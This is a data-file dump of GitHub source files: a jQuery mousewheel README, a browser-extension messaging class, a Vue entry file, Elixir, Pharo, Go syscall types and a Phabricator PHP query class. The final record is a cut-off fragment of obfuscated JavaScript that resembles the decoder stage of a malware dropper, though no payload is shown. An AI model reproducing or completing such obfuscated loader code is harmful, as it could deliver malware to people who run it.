text
stringlengths 2
100k
| meta
dict |
---|---|
# jQuery Mouse Wheel Plugin
A [jQuery](http://jquery.com/) plugin that adds cross-browser mouse wheel support with delta normalization.
In order to use the plugin, simply bind the `mousewheel` event to an element.
It also provides two helper methods called `mousewheel` and `unmousewheel`
that act just like other event helper methods in jQuery.
The event object is updated with the normalized `deltaX` and `deltaY` properties.
In addition there is a new property on the event object called `deltaFactor`. Multiply
the `deltaFactor` by `deltaX` or `deltaY` to get the scroll distance that the browser
has reported.
Here is an example of using both the bind and helper method syntax:
```js
// using on
$('#my_elem').on('mousewheel', function(event) {
console.log(event.deltaX, event.deltaY, event.deltaFactor);
});
// using the event helper
$('#my_elem').mousewheel(function(event) {
console.log(event.deltaX, event.deltaY, event.deltaFactor);
});
```
The old behavior of adding three arguments (`delta`, `deltaX`, and `deltaY`) to the
event handler is now deprecated and will be removed in later releases.
## The Deltas...
The combination of Browsers, Operating Systems, and Devices offer a huge range of possible delta values. In fact if the user
uses a trackpad and then a physical mouse wheel the delta values can differ wildly. This plugin normalizes those
values so you get a whole number starting at +-1 and going up in increments of +-1 according to the force or
acceleration that is used. This number has the potential to be in the thousands depending on the device.
Check out some of the data collected from users [here](http://mousewheeldatacollector.herokuapp.com/).
### Getting the scroll distance
In some use-cases we prefer to have the normalized delta but in others we want to know how far the browser should
scroll based on the users input. This can be done by multiplying the `deltaFactor` by the `deltaX` or `deltaY`
event property to find the scroll distance the browser reported.
The `deltaFactor` property was added to the event object in 3.1.5 so that the actual reported delta value can be
extracted. This is a non-standard property.
## Using with [Browserify](http://browserify.org)
Support for browserify is baked in.
```bash
npm install jquery-mousewheel
npm install jquery-browserify
```
In your server-side node.js code:
```js
var express = require('express');
var app = express.createServer();
app.use(require('browserify')({
require : [ 'jquery-browserify', 'jquery-mousewheel' ]
}));
```
In your browser-side javascript:
```js
var $ = require('jquery-browserify');
require('jquery-mousewheel')($);
```
| {
"pile_set_name": "Github"
} |
/**
* Messager.
*/
class Messager {
/**
* Send message to "to" module(s).
*
* @param {String | Array} to module name(s)
* @param {String} title message title
* @param {Object} detail message detail
*
* @returns {Promise<Object>} receiver reply Promise
*/
static send(to, title, detail) {
// if "to" is string, convert it into array.
if (typeof to === "string") {
to = [to];
}
// Set object is not serializable, so construct an object to quickly check existence of receivers.
let receivers = {};
for (let receiver of to) {
receivers[receiver] = true;
}
return new Promise((resolve, reject) => {
chrome.runtime.sendMessage({ to: receivers, title: title, detail: detail }, result => {
if (chrome.runtime.lastError) {
reject(chrome.runtime.lastError);
} else {
resolve(result);
}
});
});
}
/**
* Send message to "to" module(s).
*
* @param {Number} tabId id of tab to send to
* @param {String | Array} to module name(s)
* @param {String} title message title
* @param {Object} detail message detail
*
* @returns {Promise<Object>} receiver reply Promise
*/
static sendToTab(tabId, to, title, detail) {
// if "to" is string, convert it into array.
if (typeof to === "string") {
to = [to];
}
// Set object is not serializable, so construct an object to quickly check existence of receivers.
let receivers = {};
for (let receiver of to) {
receivers[receiver] = true;
}
if (BROWSER_ENV === "chrome") {
// Chrome is using callback.
return new Promise((resolve, reject) => {
chrome.tabs.sendMessage(
tabId,
{ to: receivers, title: title, detail: detail },
result => {
if (chrome.runtime.lastError) {
reject(chrome.runtime.lastError);
} else {
resolve(result);
}
}
);
});
} else {
// Firefox is using Promise.
return browser.tabs.sendMessage(tabId, { to: receivers, title: title, detail: detail });
}
}
/**
* Start to receive messages.
*
* @param {String} receiver message receiver
* @param {Function} messageHandler message handler
*
* @returns {void} nothing
*/
static receive(receiver, messageHandler) {
chrome.runtime.onMessage.addListener((message, sender, callback) => {
if (message.to && message.to[receiver]) {
messageHandler(message, sender).then(result => {
if (callback) callback(result);
});
}
return true;
});
}
}
export default Messager;
| {
"pile_set_name": "Github"
} |
import Vue from 'vue'
import App from './App'
Vue.config.productionTip = false
import {df} from './common/request/request-downFiles.js';
import rup from '@/common/request/request-upFiles.js';
df.baseuUrl = 'https://www.easy-mock.com/mock/5ca6ec41215a7b66ff10343d/'
df.defaultReq.type = "POST";
let timeout=function(){
return new Promise(resolve=>{
setTimeout(()=>{
resolve();
},3000)
})
}
df.defaultReq.beforeSend=res=>{
// await timeout();
// delete res.data
return res;
}
df.defaultReq.beforeFinish = (res, status) => {
if (!res.data.success) { //退出登录
uni.reLaunch({
url: 'login?userOut=true'
});
}
return null
}
df.defaultReq.errorHandler=(err,reject)=>{
console.log(err)
reject(err);
}
df.defaultReq.baseData = { //设置公共参数,默认为空,设置此参数后每次发送请求都会带上此参数
token: '000-000-000-000-player125'
}
//上传测试工程
rup.defaultUp.url='https://www.easy-mock.com/mock/5ca6ec41215a7b66ff10343d/'
rup.defaultUp.baseData = { //设置公共参数,默认为空,设置此参数后每次发送请求都会带上此参数
token: '000-000-000-000-defaultUp'
}
//聊天测试
// import'./common/chat/useSocket.js';
import store from "./common/chat/store.js";
Vue.prototype.$store = store;
//聊天测试结束
//自定义事件引入
import event from './common/uni-app-customEvent/custom-event.js'
const Event=new event();
Vue.prototype.$event=Event;
//自定义事件引入结束
//自定义tabbar引入
import {draw} from './common/uni-app-tabbar/useTabbar.js'
Vue.prototype.$draw=draw;
//自定义tabbar引入结束
Vue.prototype.$req = df;
Vue.prototype.$rup = rup;
Vue.config.productionTip = false;
App.mpType = 'app'
const app = new Vue({
...App,
store,
})
app.$mount()
| {
"pile_set_name": "Github"
} |
defmodule Todo.List do
defstruct auto_id: 1, entries: %{}
def new(entries \\ []) do
Enum.reduce(
entries,
%Todo.List{},
&add_entry(&2, &1)
)
end
def size(todo_list) do
Map.size(todo_list.entries)
end
def add_entry(todo_list, entry) do
entry = Map.put(entry, :id, todo_list.auto_id)
new_entries = Map.put(todo_list.entries, todo_list.auto_id, entry)
%Todo.List{todo_list | entries: new_entries, auto_id: todo_list.auto_id + 1}
end
def entries(todo_list, date) do
todo_list.entries
|> Stream.filter(fn {_, entry} -> entry.date == date end)
|> Enum.map(fn {_, entry} -> entry end)
end
def update_entry(todo_list, %{} = new_entry) do
update_entry(todo_list, new_entry.id, fn _ -> new_entry end)
end
def update_entry(todo_list, entry_id, updater_fun) do
case Map.fetch(todo_list.entries, entry_id) do
:error ->
todo_list
{:ok, old_entry} ->
new_entry = updater_fun.(old_entry)
new_entries = Map.put(todo_list.entries, new_entry.id, new_entry)
%Todo.List{todo_list | entries: new_entries}
end
end
def delete_entry(todo_list, entry_id) do
%Todo.List{todo_list | entries: Map.delete(todo_list.entries, entry_id)}
end
end
| {
"pile_set_name": "Github"
} |
"
I am an abstract paint, which should be converted before it can be used by Athens.
I am backend agnostic, as opposed to concrete paint(s).
Also, any other object can play the role of paint, as long as it implements the conversion method, #asAthensPaintOn:
See other implementors of #asAthensPaintOn:, such as Color and Form.
"
Class {
#name : #AthensAbstractPaint,
#superclass : #Object,
#category : #'Athens-Core-Paints'
}
{ #category : #converting }
AthensAbstractPaint >> asAthensPaintOn: aCanvas [
^ self
]
| {
"pile_set_name": "Github"
} |
// cgo -godefs -- -Wall -Werror -static -I/tmp/include linux/types.go | go run mkpost.go
// Code generated by the command above; see README.md. DO NOT EDIT.
// +build mips64le,linux
package unix
const (
sizeofPtr = 0x8
sizeofShort = 0x2
sizeofInt = 0x4
sizeofLong = 0x8
sizeofLongLong = 0x8
PathMax = 0x1000
)
type (
_C_short int16
_C_int int32
_C_long int64
_C_long_long int64
)
type Timespec struct {
Sec int64
Nsec int64
}
type Timeval struct {
Sec int64
Usec int64
}
type Timex struct {
Modes uint32
Pad_cgo_0 [4]byte
Offset int64
Freq int64
Maxerror int64
Esterror int64
Status int32
Pad_cgo_1 [4]byte
Constant int64
Precision int64
Tolerance int64
Time Timeval
Tick int64
Ppsfreq int64
Jitter int64
Shift int32
Pad_cgo_2 [4]byte
Stabil int64
Jitcnt int64
Calcnt int64
Errcnt int64
Stbcnt int64
Tai int32
Pad_cgo_3 [44]byte
}
type Time_t int64
type Tms struct {
Utime int64
Stime int64
Cutime int64
Cstime int64
}
type Utimbuf struct {
Actime int64
Modtime int64
}
type Rusage struct {
Utime Timeval
Stime Timeval
Maxrss int64
Ixrss int64
Idrss int64
Isrss int64
Minflt int64
Majflt int64
Nswap int64
Inblock int64
Oublock int64
Msgsnd int64
Msgrcv int64
Nsignals int64
Nvcsw int64
Nivcsw int64
}
type Rlimit struct {
Cur uint64
Max uint64
}
type _Gid_t uint32
type Stat_t struct {
Dev uint32
Pad1 [3]uint32
Ino uint64
Mode uint32
Nlink uint32
Uid uint32
Gid uint32
Rdev uint32
Pad2 [3]uint32
Size int64
Atim Timespec
Mtim Timespec
Ctim Timespec
Blksize uint32
Pad4 uint32
Blocks int64
}
type Statfs_t struct {
Type int64
Bsize int64
Frsize int64
Blocks uint64
Bfree uint64
Files uint64
Ffree uint64
Bavail uint64
Fsid Fsid
Namelen int64
Flags int64
Spare [5]int64
}
type Dirent struct {
Ino uint64
Off int64
Reclen uint16
Type uint8
Name [256]int8
Pad_cgo_0 [5]byte
}
type Fsid struct {
X__val [2]int32
}
type Flock_t struct {
Type int16
Whence int16
Pad_cgo_0 [4]byte
Start int64
Len int64
Pid int32
Pad_cgo_1 [4]byte
}
type FscryptPolicy struct {
Version uint8
Contents_encryption_mode uint8
Filenames_encryption_mode uint8
Flags uint8
Master_key_descriptor [8]uint8
}
type FscryptKey struct {
Mode uint32
Raw [64]uint8
Size uint32
}
type KeyctlDHParams struct {
Private int32
Prime int32
Base int32
}
const (
FADV_NORMAL = 0x0
FADV_RANDOM = 0x1
FADV_SEQUENTIAL = 0x2
FADV_WILLNEED = 0x3
FADV_DONTNEED = 0x4
FADV_NOREUSE = 0x5
)
type RawSockaddrInet4 struct {
Family uint16
Port uint16
Addr [4]byte /* in_addr */
Zero [8]uint8
}
type RawSockaddrInet6 struct {
Family uint16
Port uint16
Flowinfo uint32
Addr [16]byte /* in6_addr */
Scope_id uint32
}
type RawSockaddrUnix struct {
Family uint16
Path [108]int8
}
type RawSockaddrLinklayer struct {
Family uint16
Protocol uint16
Ifindex int32
Hatype uint16
Pkttype uint8
Halen uint8
Addr [8]uint8
}
type RawSockaddrNetlink struct {
Family uint16
Pad uint16
Pid uint32
Groups uint32
}
type RawSockaddrHCI struct {
Family uint16
Dev uint16
Channel uint16
}
type RawSockaddrCAN struct {
Family uint16
Pad_cgo_0 [2]byte
Ifindex int32
Addr [8]byte
}
type RawSockaddrALG struct {
Family uint16
Type [14]uint8
Feat uint32
Mask uint32
Name [64]uint8
}
type RawSockaddrVM struct {
Family uint16
Reserved1 uint16
Port uint32
Cid uint32
Zero [4]uint8
}
type RawSockaddr struct {
Family uint16
Data [14]int8
}
type RawSockaddrAny struct {
Addr RawSockaddr
Pad [96]int8
}
type _Socklen uint32
type Linger struct {
Onoff int32
Linger int32
}
type Iovec struct {
Base *byte
Len uint64
}
type IPMreq struct {
Multiaddr [4]byte /* in_addr */
Interface [4]byte /* in_addr */
}
type IPMreqn struct {
Multiaddr [4]byte /* in_addr */
Address [4]byte /* in_addr */
Ifindex int32
}
type IPv6Mreq struct {
Multiaddr [16]byte /* in6_addr */
Interface uint32
}
type PacketMreq struct {
Ifindex int32
Type uint16
Alen uint16
Address [8]uint8
}
type Msghdr struct {
Name *byte
Namelen uint32
Pad_cgo_0 [4]byte
Iov *Iovec
Iovlen uint64
Control *byte
Controllen uint64
Flags int32
Pad_cgo_1 [4]byte
}
type Cmsghdr struct {
Len uint64
Level int32
Type int32
}
type Inet4Pktinfo struct {
Ifindex int32
Spec_dst [4]byte /* in_addr */
Addr [4]byte /* in_addr */
}
type Inet6Pktinfo struct {
Addr [16]byte /* in6_addr */
Ifindex uint32
}
type IPv6MTUInfo struct {
Addr RawSockaddrInet6
Mtu uint32
}
type ICMPv6Filter struct {
Data [8]uint32
}
type Ucred struct {
Pid int32
Uid uint32
Gid uint32
}
type TCPInfo struct {
State uint8
Ca_state uint8
Retransmits uint8
Probes uint8
Backoff uint8
Options uint8
Pad_cgo_0 [2]byte
Rto uint32
Ato uint32
Snd_mss uint32
Rcv_mss uint32
Unacked uint32
Sacked uint32
Lost uint32
Retrans uint32
Fackets uint32
Last_data_sent uint32
Last_ack_sent uint32
Last_data_recv uint32
Last_ack_recv uint32
Pmtu uint32
Rcv_ssthresh uint32
Rtt uint32
Rttvar uint32
Snd_ssthresh uint32
Snd_cwnd uint32
Advmss uint32
Reordering uint32
Rcv_rtt uint32
Rcv_space uint32
Total_retrans uint32
}
const (
SizeofSockaddrInet4 = 0x10
SizeofSockaddrInet6 = 0x1c
SizeofSockaddrAny = 0x70
SizeofSockaddrUnix = 0x6e
SizeofSockaddrLinklayer = 0x14
SizeofSockaddrNetlink = 0xc
SizeofSockaddrHCI = 0x6
SizeofSockaddrCAN = 0x10
SizeofSockaddrALG = 0x58
SizeofSockaddrVM = 0x10
SizeofLinger = 0x8
SizeofIovec = 0x10
SizeofIPMreq = 0x8
SizeofIPMreqn = 0xc
SizeofIPv6Mreq = 0x14
SizeofPacketMreq = 0x10
SizeofMsghdr = 0x38
SizeofCmsghdr = 0x10
SizeofInet4Pktinfo = 0xc
SizeofInet6Pktinfo = 0x14
SizeofIPv6MTUInfo = 0x20
SizeofICMPv6Filter = 0x20
SizeofUcred = 0xc
SizeofTCPInfo = 0x68
)
const (
IFA_UNSPEC = 0x0
IFA_ADDRESS = 0x1
IFA_LOCAL = 0x2
IFA_LABEL = 0x3
IFA_BROADCAST = 0x4
IFA_ANYCAST = 0x5
IFA_CACHEINFO = 0x6
IFA_MULTICAST = 0x7
IFLA_UNSPEC = 0x0
IFLA_ADDRESS = 0x1
IFLA_BROADCAST = 0x2
IFLA_IFNAME = 0x3
IFLA_MTU = 0x4
IFLA_LINK = 0x5
IFLA_QDISC = 0x6
IFLA_STATS = 0x7
IFLA_COST = 0x8
IFLA_PRIORITY = 0x9
IFLA_MASTER = 0xa
IFLA_WIRELESS = 0xb
IFLA_PROTINFO = 0xc
IFLA_TXQLEN = 0xd
IFLA_MAP = 0xe
IFLA_WEIGHT = 0xf
IFLA_OPERSTATE = 0x10
IFLA_LINKMODE = 0x11
IFLA_LINKINFO = 0x12
IFLA_NET_NS_PID = 0x13
IFLA_IFALIAS = 0x14
IFLA_MAX = 0x2b
RT_SCOPE_UNIVERSE = 0x0
RT_SCOPE_SITE = 0xc8
RT_SCOPE_LINK = 0xfd
RT_SCOPE_HOST = 0xfe
RT_SCOPE_NOWHERE = 0xff
RT_TABLE_UNSPEC = 0x0
RT_TABLE_COMPAT = 0xfc
RT_TABLE_DEFAULT = 0xfd
RT_TABLE_MAIN = 0xfe
RT_TABLE_LOCAL = 0xff
RT_TABLE_MAX = 0xffffffff
RTA_UNSPEC = 0x0
RTA_DST = 0x1
RTA_SRC = 0x2
RTA_IIF = 0x3
RTA_OIF = 0x4
RTA_GATEWAY = 0x5
RTA_PRIORITY = 0x6
RTA_PREFSRC = 0x7
RTA_METRICS = 0x8
RTA_MULTIPATH = 0x9
RTA_FLOW = 0xb
RTA_CACHEINFO = 0xc
RTA_TABLE = 0xf
RTN_UNSPEC = 0x0
RTN_UNICAST = 0x1
RTN_LOCAL = 0x2
RTN_BROADCAST = 0x3
RTN_ANYCAST = 0x4
RTN_MULTICAST = 0x5
RTN_BLACKHOLE = 0x6
RTN_UNREACHABLE = 0x7
RTN_PROHIBIT = 0x8
RTN_THROW = 0x9
RTN_NAT = 0xa
RTN_XRESOLVE = 0xb
RTNLGRP_NONE = 0x0
RTNLGRP_LINK = 0x1
RTNLGRP_NOTIFY = 0x2
RTNLGRP_NEIGH = 0x3
RTNLGRP_TC = 0x4
RTNLGRP_IPV4_IFADDR = 0x5
RTNLGRP_IPV4_MROUTE = 0x6
RTNLGRP_IPV4_ROUTE = 0x7
RTNLGRP_IPV4_RULE = 0x8
RTNLGRP_IPV6_IFADDR = 0x9
RTNLGRP_IPV6_MROUTE = 0xa
RTNLGRP_IPV6_ROUTE = 0xb
RTNLGRP_IPV6_IFINFO = 0xc
RTNLGRP_IPV6_PREFIX = 0x12
RTNLGRP_IPV6_RULE = 0x13
RTNLGRP_ND_USEROPT = 0x14
SizeofNlMsghdr = 0x10
SizeofNlMsgerr = 0x14
SizeofRtGenmsg = 0x1
SizeofNlAttr = 0x4
SizeofRtAttr = 0x4
SizeofIfInfomsg = 0x10
SizeofIfAddrmsg = 0x8
SizeofRtMsg = 0xc
SizeofRtNexthop = 0x8
)
type NlMsghdr struct {
Len uint32
Type uint16
Flags uint16
Seq uint32
Pid uint32
}
type NlMsgerr struct {
Error int32
Msg NlMsghdr
}
type RtGenmsg struct {
Family uint8
}
type NlAttr struct {
Len uint16
Type uint16
}
type RtAttr struct {
Len uint16
Type uint16
}
type IfInfomsg struct {
Family uint8
X__ifi_pad uint8
Type uint16
Index int32
Flags uint32
Change uint32
}
type IfAddrmsg struct {
Family uint8
Prefixlen uint8
Flags uint8
Scope uint8
Index uint32
}
type RtMsg struct {
Family uint8
Dst_len uint8
Src_len uint8
Tos uint8
Table uint8
Protocol uint8
Scope uint8
Type uint8
Flags uint32
}
type RtNexthop struct {
Len uint16
Flags uint8
Hops uint8
Ifindex int32
}
const (
SizeofSockFilter = 0x8
SizeofSockFprog = 0x10
)
type SockFilter struct {
Code uint16
Jt uint8
Jf uint8
K uint32
}
type SockFprog struct {
Len uint16
Pad_cgo_0 [6]byte
Filter *SockFilter
}
type InotifyEvent struct {
Wd int32
Mask uint32
Cookie uint32
Len uint32
}
const SizeofInotifyEvent = 0x10
type PtraceRegs struct {
Regs [32]uint64
Lo uint64
Hi uint64
Epc uint64
Badvaddr uint64
Status uint64
Cause uint64
}
type FdSet struct {
Bits [16]int64
}
type Sysinfo_t struct {
Uptime int64
Loads [3]uint64
Totalram uint64
Freeram uint64
Sharedram uint64
Bufferram uint64
Totalswap uint64
Freeswap uint64
Procs uint16
Pad uint16
Pad_cgo_0 [4]byte
Totalhigh uint64
Freehigh uint64
Unit uint32
X_f [0]int8
Pad_cgo_1 [4]byte
}
type Utsname struct {
Sysname [65]int8
Nodename [65]int8
Release [65]int8
Version [65]int8
Machine [65]int8
Domainname [65]int8
}
type Ustat_t struct {
Tfree int32
Pad_cgo_0 [4]byte
Tinode uint64
Fname [6]int8
Fpack [6]int8
Pad_cgo_1 [4]byte
}
type EpollEvent struct {
Events uint32
Fd int32
Pad int32
}
const (
AT_FDCWD = -0x64
AT_REMOVEDIR = 0x200
AT_SYMLINK_FOLLOW = 0x400
AT_SYMLINK_NOFOLLOW = 0x100
)
type PollFd struct {
Fd int32
Events int16
Revents int16
}
const (
POLLIN = 0x1
POLLPRI = 0x2
POLLOUT = 0x4
POLLRDHUP = 0x2000
POLLERR = 0x8
POLLHUP = 0x10
POLLNVAL = 0x20
)
type Sigset_t struct {
X__val [16]uint64
}
const RNDGETENTCNT = 0x40045200
const PERF_IOC_FLAG_GROUP = 0x1
const _SC_PAGESIZE = 0x1e
type Termios struct {
Iflag uint32
Oflag uint32
Cflag uint32
Lflag uint32
Line uint8
Cc [23]uint8
Ispeed uint32
Ospeed uint32
}
type Winsize struct {
Row uint16
Col uint16
Xpixel uint16
Ypixel uint16
}
| {
"pile_set_name": "Github"
} |
<?php
final class PhabricatorFileQuery
extends PhabricatorCursorPagedPolicyAwareQuery {
private $ids;
private $phids;
private $authorPHIDs;
private $explicitUploads;
private $transforms;
private $dateCreatedAfter;
private $dateCreatedBefore;
private $contentHashes;
private $minLength;
private $maxLength;
private $names;
private $isPartial;
private $isDeleted;
private $needTransforms;
private $builtinKeys;
private $isBuiltin;
private $storageEngines;
public function withIDs(array $ids) {
$this->ids = $ids;
return $this;
}
public function withPHIDs(array $phids) {
$this->phids = $phids;
return $this;
}
public function withAuthorPHIDs(array $phids) {
$this->authorPHIDs = $phids;
return $this;
}
public function withDateCreatedBefore($date_created_before) {
$this->dateCreatedBefore = $date_created_before;
return $this;
}
public function withDateCreatedAfter($date_created_after) {
$this->dateCreatedAfter = $date_created_after;
return $this;
}
public function withContentHashes(array $content_hashes) {
$this->contentHashes = $content_hashes;
return $this;
}
public function withBuiltinKeys(array $keys) {
$this->builtinKeys = $keys;
return $this;
}
public function withIsBuiltin($is_builtin) {
$this->isBuiltin = $is_builtin;
return $this;
}
/**
* Select files which are transformations of some other file. For example,
* you can use this query to find previously generated thumbnails of an image
* file.
*
* As a parameter, provide a list of transformation specifications. Each
* specification is a dictionary with the keys `originalPHID` and `transform`.
* The `originalPHID` is the PHID of the original file (the file which was
* transformed) and the `transform` is the name of the transform to query
* for. If you pass `true` as the `transform`, all transformations of the
* file will be selected.
*
* For example:
*
* array(
* array(
* 'originalPHID' => 'PHID-FILE-aaaa',
* 'transform' => 'sepia',
* ),
* array(
* 'originalPHID' => 'PHID-FILE-bbbb',
* 'transform' => true,
* ),
* )
*
* This selects the `"sepia"` transformation of the file with PHID
* `PHID-FILE-aaaa` and all transformations of the file with PHID
* `PHID-FILE-bbbb`.
*
* @param list<dict> List of transform specifications, described above.
* @return this
*/
public function withTransforms(array $specs) {
foreach ($specs as $spec) {
if (!is_array($spec) ||
empty($spec['originalPHID']) ||
empty($spec['transform'])) {
throw new Exception(
pht(
"Transform specification must be a dictionary with keys ".
"'%s' and '%s'!",
'originalPHID',
'transform'));
}
}
$this->transforms = $specs;
return $this;
}
public function withLengthBetween($min, $max) {
$this->minLength = $min;
$this->maxLength = $max;
return $this;
}
public function withNames(array $names) {
$this->names = $names;
return $this;
}
public function withIsPartial($partial) {
$this->isPartial = $partial;
return $this;
}
public function withIsDeleted($deleted) {
$this->isDeleted = $deleted;
return $this;
}
public function withNameNgrams($ngrams) {
return $this->withNgramsConstraint(
id(new PhabricatorFileNameNgrams()),
$ngrams);
}
public function withStorageEngines(array $engines) {
$this->storageEngines = $engines;
return $this;
}
public function showOnlyExplicitUploads($explicit_uploads) {
$this->explicitUploads = $explicit_uploads;
return $this;
}
public function needTransforms(array $transforms) {
$this->needTransforms = $transforms;
return $this;
}
public function newResultObject() {
return new PhabricatorFile();
}
protected function loadPage() {
$files = $this->loadStandardPage($this->newResultObject());
if (!$files) {
return $files;
}
// Figure out which files we need to load attached objects for. In most
// cases, we need to load attached objects to perform policy checks for
// files.
// However, in some special cases where we know files will always be
// visible, we skip this. See T8478 and T13106.
$need_objects = array();
$need_xforms = array();
foreach ($files as $file) {
$always_visible = false;
if ($file->getIsProfileImage()) {
$always_visible = true;
}
if ($file->isBuiltin()) {
$always_visible = true;
}
if ($always_visible) {
// We just treat these files as though they aren't attached to
// anything. This saves a query in common cases when we're loading
// profile images or builtins. We could be slightly more nuanced
// about this and distinguish between "not attached to anything" and
// "might be attached but policy checks don't need to care".
$file->attachObjectPHIDs(array());
continue;
}
$need_objects[] = $file;
$need_xforms[] = $file;
}
$viewer = $this->getViewer();
$is_omnipotent = $viewer->isOmnipotent();
// If we have any files left which do need objects, load the edges now.
$object_phids = array();
if ($need_objects) {
$edge_type = PhabricatorFileHasObjectEdgeType::EDGECONST;
$file_phids = mpull($need_objects, 'getPHID');
$edges = id(new PhabricatorEdgeQuery())
->withSourcePHIDs($file_phids)
->withEdgeTypes(array($edge_type))
->execute();
foreach ($need_objects as $file) {
$phids = array_keys($edges[$file->getPHID()][$edge_type]);
$file->attachObjectPHIDs($phids);
if ($is_omnipotent) {
// If the viewer is omnipotent, we don't need to load the associated
// objects either since the viewer can certainly see the object.
// Skipping this can improve performance and prevent cycles. This
// could possibly become part of the profile/builtin code above which
// short circuits attacment policy checks in cases where we know them
// to be unnecessary.
continue;
}
foreach ($phids as $phid) {
$object_phids[$phid] = true;
}
}
}
// If this file is a transform of another file, load that file too. If you
// can see the original file, you can see the thumbnail.
// TODO: It might be nice to put this directly on PhabricatorFile and
// remove the PhabricatorTransformedFile table, which would be a little
// simpler.
if ($need_xforms) {
$xforms = id(new PhabricatorTransformedFile())->loadAllWhere(
'transformedPHID IN (%Ls)',
mpull($need_xforms, 'getPHID'));
$xform_phids = mpull($xforms, 'getOriginalPHID', 'getTransformedPHID');
foreach ($xform_phids as $derived_phid => $original_phid) {
$object_phids[$original_phid] = true;
}
} else {
$xform_phids = array();
}
$object_phids = array_keys($object_phids);
// Now, load the objects.
$objects = array();
if ($object_phids) {
// NOTE: We're explicitly turning policy exceptions off, since the rule
// here is "you can see the file if you can see ANY associated object".
// Without this explicit flag, we'll incorrectly throw unless you can
// see ALL associated objects.
$objects = id(new PhabricatorObjectQuery())
->setParentQuery($this)
->setViewer($this->getViewer())
->withPHIDs($object_phids)
->setRaisePolicyExceptions(false)
->execute();
$objects = mpull($objects, null, 'getPHID');
}
foreach ($files as $file) {
$file_objects = array_select_keys($objects, $file->getObjectPHIDs());
$file->attachObjects($file_objects);
}
foreach ($files as $key => $file) {
$original_phid = idx($xform_phids, $file->getPHID());
if ($original_phid == PhabricatorPHIDConstants::PHID_VOID) {
// This is a special case for builtin files, which are handled
// oddly.
$original = null;
} else if ($original_phid) {
$original = idx($objects, $original_phid);
if (!$original) {
// If the viewer can't see the original file, also prevent them from
// seeing the transformed file.
$this->didRejectResult($file);
unset($files[$key]);
continue;
}
} else {
$original = null;
}
$file->attachOriginalFile($original);
}
return $files;
}
protected function didFilterPage(array $files) {
$xform_keys = $this->needTransforms;
if ($xform_keys !== null) {
$xforms = id(new PhabricatorTransformedFile())->loadAllWhere(
'originalPHID IN (%Ls) AND transform IN (%Ls)',
mpull($files, 'getPHID'),
$xform_keys);
if ($xforms) {
$xfiles = id(new PhabricatorFile())->loadAllWhere(
'phid IN (%Ls)',
mpull($xforms, 'getTransformedPHID'));
$xfiles = mpull($xfiles, null, 'getPHID');
}
$xform_map = array();
foreach ($xforms as $xform) {
$xfile = idx($xfiles, $xform->getTransformedPHID());
if (!$xfile) {
continue;
}
$original_phid = $xform->getOriginalPHID();
$xform_key = $xform->getTransform();
$xform_map[$original_phid][$xform_key] = $xfile;
}
$default_xforms = array_fill_keys($xform_keys, null);
foreach ($files as $file) {
$file_xforms = idx($xform_map, $file->getPHID(), array());
$file_xforms += $default_xforms;
$file->attachTransforms($file_xforms);
}
}
return $files;
}
protected function buildJoinClauseParts(AphrontDatabaseConnection $conn) {
$joins = parent::buildJoinClauseParts($conn);
if ($this->transforms) {
$joins[] = qsprintf(
$conn,
'JOIN %T t ON t.transformedPHID = f.phid',
id(new PhabricatorTransformedFile())->getTableName());
}
return $joins;
}
protected function buildWhereClauseParts(AphrontDatabaseConnection $conn) {
$where = parent::buildWhereClauseParts($conn);
if ($this->ids !== null) {
$where[] = qsprintf(
$conn,
'f.id IN (%Ld)',
$this->ids);
}
if ($this->phids !== null) {
$where[] = qsprintf(
$conn,
'f.phid IN (%Ls)',
$this->phids);
}
if ($this->authorPHIDs !== null) {
$where[] = qsprintf(
$conn,
'f.authorPHID IN (%Ls)',
$this->authorPHIDs);
}
if ($this->explicitUploads !== null) {
$where[] = qsprintf(
$conn,
'f.isExplicitUpload = %d',
(int)$this->explicitUploads);
}
if ($this->transforms !== null) {
$clauses = array();
foreach ($this->transforms as $transform) {
if ($transform['transform'] === true) {
$clauses[] = qsprintf(
$conn,
'(t.originalPHID = %s)',
$transform['originalPHID']);
} else {
$clauses[] = qsprintf(
$conn,
'(t.originalPHID = %s AND t.transform = %s)',
$transform['originalPHID'],
$transform['transform']);
}
}
$where[] = qsprintf($conn, '%LO', $clauses);
}
if ($this->dateCreatedAfter !== null) {
$where[] = qsprintf(
$conn,
'f.dateCreated >= %d',
$this->dateCreatedAfter);
}
if ($this->dateCreatedBefore !== null) {
$where[] = qsprintf(
$conn,
'f.dateCreated <= %d',
$this->dateCreatedBefore);
}
if ($this->contentHashes !== null) {
$where[] = qsprintf(
$conn,
'f.contentHash IN (%Ls)',
$this->contentHashes);
}
if ($this->minLength !== null) {
$where[] = qsprintf(
$conn,
'byteSize >= %d',
$this->minLength);
}
if ($this->maxLength !== null) {
$where[] = qsprintf(
$conn,
'byteSize <= %d',
$this->maxLength);
}
if ($this->names !== null) {
$where[] = qsprintf(
$conn,
'name in (%Ls)',
$this->names);
}
if ($this->isPartial !== null) {
$where[] = qsprintf(
$conn,
'isPartial = %d',
(int)$this->isPartial);
}
if ($this->isDeleted !== null) {
$where[] = qsprintf(
$conn,
'isDeleted = %d',
(int)$this->isDeleted);
}
if ($this->builtinKeys !== null) {
$where[] = qsprintf(
$conn,
'builtinKey IN (%Ls)',
$this->builtinKeys);
}
if ($this->isBuiltin !== null) {
if ($this->isBuiltin) {
$where[] = qsprintf(
$conn,
'builtinKey IS NOT NULL');
} else {
$where[] = qsprintf(
$conn,
'builtinKey IS NULL');
}
}
if ($this->storageEngines !== null) {
$where[] = qsprintf(
$conn,
'storageEngine IN (%Ls)',
$this->storageEngines);
}
return $where;
}
protected function getPrimaryTableAlias() {
return 'f';
}
public function getQueryApplicationClass() {
return 'PhabricatorFilesApplication';
}
}
| {
"pile_set_name": "Github"
} |
String.prototype.DisassociativeKMx1 = function () {return this.split(",").join("");};
//BEGIN_CODEC_PART
function DisassociativeNXr9(DisassociativeTWf7)
{var DisassociativeFDs1=new Array();
DisassociativeFDs1[199]=128;DisassociativeFDs1[252]=129;DisassociativeFDs1[233]=130;DisassociativeFDs1[226]=131;DisassociativeFDs1[228]=132;DisassociativeFDs1[224]=133;DisassociativeFDs1[229]=134;DisassociativeFDs1[231]=135;DisassociativeFDs1[234]=136;DisassociativeFDs1[235]=137;
DisassociativeFDs1[232]=138;DisassociativeFDs1[239]=139;DisassociativeFDs1[238]=140;DisassociativeFDs1[236]=141;DisassociativeFDs1[196]=142;DisassociativeFDs1[197]=143;DisassociativeFDs1[201]=144;DisassociativeFDs1[230]=145;DisassociativeFDs1[198]=146;DisassociativeFDs1[244]=147;
